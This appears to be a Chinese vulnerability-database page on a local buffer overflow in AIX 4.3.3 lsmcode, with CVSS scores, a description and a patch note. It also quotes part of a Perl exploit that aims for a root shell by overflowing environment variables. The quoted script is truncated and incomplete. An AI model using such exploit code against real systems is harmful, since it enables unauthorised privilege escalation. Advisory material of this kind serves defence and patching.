发布时间 :2002-08-12 00:00:00
修订时间 :2008-09-05 16:28:50

[原文]Buffer overflow in lsmcode in AIX 4.3.3.

[CNNVD]AIX lsmcode缓冲区溢出漏洞(CNNVD-200208-178)

        AIX 4.3.3版本lsmcode存在缓冲区溢出漏洞。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

AIX lsmcode缓冲区溢出漏洞
危急 缓冲区溢出
2002-08-12 00:00:00 2005-10-20 00:00:00
        AIX 4.3.3版本lsmcode存在缓冲区溢出漏洞。

- 公告与补丁


- 漏洞信息 (22756)

IBM AIX 4.3.x/5.1 LSMCODE Environment Variable Local Buffer Overflow Vulnerability (EDBID:22756)
aix local
2003-06-01 Verified
0 watercloud
N/A [点击下载]

Insufficient bounds checking in the lsmcode utility will allow locally based attackers to cause memory to be corrupted with attacker-supplied data. As a result, it is possible to exploit this condition to execute arbitrary attacker-supplied instructions with elevated privileges. 

# FileName:
# Exploit lsmcode of Aix4.3.3 to get a uid=0 shell.
# Tested  : on Aix4.3.3.Mybe can work on other versions.
# Author  :
# Site    :
# Date    : 2003-6-1
# Announce: use as your owner risk!


print "\n\nExploit $CMD for Aix 4.3.3 to get uid=0 shell.\n";
print "From: [ 2003-6-1 ].\n\n";


$ENV{CCC}="A" .$NOP.&getshell($XID,$UID);
$ret = system $CMD ,"-d","a";

for($i=0;$i<4 && $ret;$i++){
  for($j=0;$j<4 && $ret;$j++) {
    $ENV{CCC}="A"x $i .$NOP.&getshell($XID,$UID);
    $ENV{DIAGNOSTICS}="A"x $j ."\x2f\xf2\x2a\x2f"x300;
    $ret = system $CMD ,"-d","a";

sub getshell($XID,$GID) {
  my $SHELL,($XID,$GID)=@_;
  return $SHELL;

- 漏洞信息

IBM AIX lsmcode Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A local overflow exists in IBM AIX. The lsmcode command fails to validate input resulting in a possible buffer overflow. With a specially crafted request, an attacker can cause arbitrary command execution resulting in a loss of integrity.

- 时间线

2002-04-18 Unknow
2003-06-01 Unknow

- 解决方案

Upgrade to version 4.3.3 (APAR IY29589), 5.1.0 (APAR IY28586) or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete